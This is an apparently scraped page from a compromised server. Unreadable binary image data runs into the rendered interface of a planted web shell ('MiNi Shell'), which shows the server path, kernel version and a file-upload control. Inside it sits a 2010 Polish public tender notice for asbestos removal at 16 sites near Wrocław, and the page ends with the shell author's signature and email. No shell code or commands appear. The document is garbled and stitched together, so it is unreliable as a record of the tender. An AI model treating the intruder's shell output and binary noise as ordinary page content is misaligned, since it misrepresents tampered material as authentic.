JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100730/232668-N-2010.html

<p class="kh_header"><b>Wrocław: Usługi usuwania azbestu  polegające na rozbiórce, składowaniu, transporcie do miejsca utylizacji wraz z ich przekazaniem  w miejscu utylizacji - odpadów o kodzie 17 06 05 powstałych z elementów konstrukcyjnych zawierających azbest z obiektów budowlanych  znajdujących się w Zasobie Własności Rolnej Skarbu Państwa właściwym dla  Oddziału Terenowego  Agencji Nieruchomości Rolnych we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 232668 - 2010; data zamieszczenia: 30.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 071 3563919, 3563862, 3563863, faks 071 3579097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi usuwania azbestu  polegające na rozbiórce, składowaniu, transporcie do miejsca utylizacji wraz z ich przekazaniem  w miejscu utylizacji - odpadów o kodzie 17 06 05 powstałych z elementów konstrukcyjnych zawierających azbest z obiektów budowlanych  znajdujących się w Zasobie Własności Rolnej Skarbu Państwa właściwym dla  Oddziału Terenowego  Agencji Nieruchomości Rolnych we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbiórkę, uprzątnięcie gruzu, składowanie, transport do miejsca utylizacji wraz z przekazaniem w miejscu utylizacji - odpadów o kodzie 17 06 05 powstałych z elementów konstrukcyjnych zawierających azbest wbudowanych w budynkach będących w Zasobie Własności Rolnej Skarbu Państwa właściwym dla Oddziału Terenowego Agencji Nieruchomości Rolnych we Wrocławiu.

Zamówienie podzielono na 16 odrębnych części zamówienia:

Przedmiot 1 
Usuwanie odpadów zlokalizowanych na terenie powiatu średzkiego, gmina Kostomłoty obręb Jarząbkowice pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 1585 m 2
Przedmiot 2
Usuwanie odpadów zlokalizowanych na terenie powiatu średzkiego, gmina Kostomłoty obręb Chmielów pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 1000 m 2
Przedmiot 3
Usuwanie odpadów zlokalizowanych na terenie powiatu średzkiego, gmina Udanin obręb Udanin i Gościsław pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 3400 m 2
Przedmiot 4
Usuwanie odpadów zlokalizowanych na terenie powiatu wrocławskiego, gmina Jordanów Śl. obręb Wilczkowice pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 1030 m 2

Przedmiot 5
Usuwanie odpadów zlokalizowanych na terenie powiatu ząbkowickiego gmina Ząbkowice Śląskie obręb Bobolice pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 370 m 2

Przedmiot 6
Usuwanie odpadów zlokalizowanych na terenie powiatu wołowskiego gmina Wińsko obręb Krzelów pochodzącego z płyt azbestowo - cementowych falistych, płaskich  i powstałego z nich gruzu w ilości 65t.

Przedmiot 7
Usuwanie odpadów zlokalizowanych na terenie powiatu strzelińskiego gmina Strzelin obręb Karszów pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 600 m 2.

Przedmiot 8
Usuwanie odpadów zlokalizowanych na terenie powiatu złotoryjskiego gmina Pielgrzymka obręb Jastrzębnik pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 512 m 2.

Przedmiot 9
Usuwanie odpadów zlokalizowanych na terenie powiatu wrocławskiego gmina Sobótka obręb Ręków pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 0,3t.

Przedmiot 10
Usuwanie odpadów zlokalizowanych na terenie powiatu kłodzkiego gmina Kłodzko obręb Szalejów Dolny pochodzącego z płyt azbestowo - cementowych płaskich i powstałego z nich gruzu w ilości  559 m 2.

Przedmiot 11
Usuwanie odpadów zlokalizowanych na terenie powiatu górowskiego gmina Niechlów obręb Masełkowice pochodzącego z płyt azbestowo - cementowych falistych, płaskich i powstałego z nich gruzu w ilości 860 m 2.

Przedmiot 12
Usuwanie odpadów zlokalizowanych na terenie powiatu dzierżoniowskiego gmina Łagiewniki obręb Kuchary pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 498 m 2.

Przedmiot 13
Usuwanie odpadów zlokalizowanych na terenie powiatu średzkiego gmina Kostomłoty obręb Piersno pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 40 m 2.

Przedmiot 14
Usuwanie odpadów zlokalizowanych na terenie powiatu lubińskiego gmina Rudna obręb Nieszczyce pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 350 m 2.

Przedmiot 15
Usuwanie odpadów zlokalizowanych na terenie miasta Wrocław ul. Kunickiego 6/8 pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 6t.

Przedmiot 16
Usuwanie odpadów zlokalizowanych na terenie powiatu górowskiego gmina Wąsosz obręb Lubiel i Kamień Górowski pochodzącego z płyt azbestowo - cementowych falistych i powstałego z nich gruzu w ilości 1150 m 2.

Szczegółowe informacje o wymienionych częściach zamówienia zawiera tabela stanowiąca załącznik nr 1 do SIWZ. Części nie mogą być dzielone przez Wykonawców, oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone.

4	Wykonawca biorący udział w postępowaniu zobowiązany jest do uzyskania przed terminem otwarcia ofert oraz  złożenia w ofercie: pozwolenia na wytwarzanie odpadów wydane przez właściwy dla danego  przedmiotu zamówienia terytorialnie urząd (starostwo ) w formie decyzji zgodnie z art. 17, 18, 20 ustawy z dn. 27 kwietnia 2001 o odpadach (Dz.U. 2007 Nr 39 poz. 251)  oraz do złożenia oświadczenia, iż pozostająca do wykorzystania ilość z przysługującego limitu jest wystarczająca do wykonania zamówienia.   
5	 Zakres zamówienia. 
a)	Roboty rozbiórkowe wyrobów zawierających azbest, wbudowanych w obiektach budowlanych - nie dotyczy obiektów, gdzie wyroby zawierające azbest są zdemontowane.
b)	Uprzątnięcie terenu obiektu budowlanego z gruzu zawierającego azbest powstałego przed i po wykonaniu czynności opisanej w poz. a), 
c)	Pakowanie wyrobów  zawierających azbest.
d)	Transport wyrobów zawierających azbest na miejsce składowania i utylizacji.
e)	Zapewnienie miejsca składowania i utylizacji wyrobów zawierających azbest.
f)	Złożenie Zamawiającemu dokumentów potwierdzających miejsce składowania wyrobów azbest.
g)	W przypadku wymaganym prawem wykazanie braku zanieczyszczenia (zapylenia) przeprowadzenie pomiarów stężeń pyłów azbestu i przedstawienie wyników Zamawiającemu.
h)	Złożenie zamawiającemu jako właścicielowi pisemnego oświadczenia o prawidłowości wykonania w/w prac oraz o oczyszczeniu terenu z pyłu azbestowego, z zachowaniem właściwych przepisów technicznych i sanitarnych.

6	Informacje dodatkowe.
a:	Z uwagi na zagrożenie dla środowiska naturalnego, z wyrobami z azbestu należy postępować oraz wszystkie czynności wykonać zgodnie z:
-	Ustawą z dn. 27 kwietnia 2001 o odpadach (tj. Dz.U.2007 Nr 39 poz. 251z późn. zm.)
-	Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dn. 2 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania  usuwania wyrobów zawierających azbest (tj. Dz.U. 04.71.649),
-	Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dn. 23 października 2003 r. w sprawie wymagań w zakresie wykorzystywania i przemieszczania azbestu oraz wykorzystywania i oczyszczania instalacji lub urządzeń, w których był lub jest wykorzystywany azbest (tj.Dz.U. 03.192.1876 z pózn. zm.),
-	Rozporządzeniem Ministra Gospodarki, Pracy z dnia 14 października 2005r w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz.U.05.216.1824).
-	Ustawą z dn. 7 lipca 1994 r. Prawo budowlane (tj. Dz. U., 2006 nr 156 poz. 1118 z późn. zm.) ,
-	Innymi obowiązującymi przepisami nie wymienionymi wyżej w zakresie objętym zamówieniem
7	Wykonawca we własnym zakresie utrzyma w należytej sprawności oznakowanie terenu robót zgodnie z zasadami bezpieczeństwa i ochrony zdrowia  oraz obowiązującymi przepisami Prawa budowlanego.
8	Pozostałe warunki zostały określone w rozdziale Istotne postanowienia do umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania usługi objętej zamówieniem jeżeli przepisy prawa nakładają obowiązek ich posiadania - Wykonawca zobowiązany jest załączyć do oferty:
1	Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego SIWZ
2	decyzje właściwego terytorialnie organu ochrony środowiska do wytwarzania odpadów zawierających azbest zgodnie z Rozporządzeniami Ministra Gospodarki, Pracy i Polityki Społecznej w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz.U. 04.71 poz 649).
3	Oświadczenie, iż pozostająca do wykorzystania ilość z limitu ustalonego w pozwoleniu wyżej wymienionym na wytwarzanie odpadu o kodzie 17 06 05 jest wystarczająca do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada wiedzę i doświadczenie - Wykonawca zobowiązany jest załączyć do oferty:
4	wykaz wykonanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług usuwania azbestu z podaniem  wartości usługi, przedmiotu, dat wykonania i odbiorców. Wymagane jest posiadanie minimalnego doświadczenia:  w okresie ostatnich 3 lat wykonanie co najmniej 3 usług usuwania azbestu w trzech lokalizacjach. 
5	Dokumenty potwierdzające bezspornie, że usługi wymienione w wykazie opisanym w pkt. 7.4 zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Wykonawca zobowiązany jest załączyć do oferty:
6	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług i kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami. Dla części 1-8, 10-14 i 16  wymagane jest  posiadanie uprawnień do nadzorowania i kierowania robotami budowlanymi w branży: konstrukcyjno - budowlanej. Do wykazu należy dołączyć oświadczenie,  że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane prawem uprawnienia. Wykaz i oświadczenie winno być zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 4 Formularza Ofertowego.
7	Oświadczenie o posiadaniu ważnej umowy na składowanie i utylizację wyrobów zawierających azbest z uprawnionym do tych czynności podmiotem lub posiadanie uprawnień do składowania i utylizacji wyrobów zawierających azbest,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia-  Wykonawca zobowiązany jest załączyć do oferty:
8	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Z przedłożonych dokumentów winno bezspornie wynikać, iż ubezpieczenie jest opłacone poprzez jednoznaczny zapis na polisie lub dowód opłacenia przelewem lub do kasy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
a.	Zmiana terminu realizacji przedmiotu umowy:
-	 Zmiany spowodowane warunkami atmosferycznymi w szczególności: klęski żywiołowe, udokumentowane warunki atmosferyczne uniemożliwiające realizację usługi. 
-	Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego: wstrzymanie realizacji przedmiotu umowy przez zamawiającego, opóźnienia w przekazaniu terenu wymienionego w § 9 ust. 2. przez Zamawiającego. 
-	Zmiany wynikające z nie przekazania przez Zamawiającego terenu, na którym wykonywana będzie usługa, z winy użytkownika nieruchomości.
b.	Zmiany będące następstwem działania osób trzecich: będące następstwem działania organów administracji w szczególności przekroczenie określonych przez prawo terminów wydania przez organy administracji decyzji, zezwoleń itp.
c.	Zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego
d.	Zmiany osobowe: zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub innych uprawnieniach, zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem zamówienia.
e.	Pozostałe zmiany: siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, zmiana adresu, itp.).
3	Zmiany, o których mowa, ust.2, nie mogą stanowić podstawy zwiększenia wynagrodzenia
4	 Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego. 
5	 Nie stanowią zmian umowy w rozumieniu art.144 ustawy prawo zamówień publicznych:
a)	 udzielanie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych 
b)	 Wydłużenie okresu gwarancji lub rękojmi o dowolny okres</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.anr.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2010 godzina 10:15, miejsce: Kancelaria Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com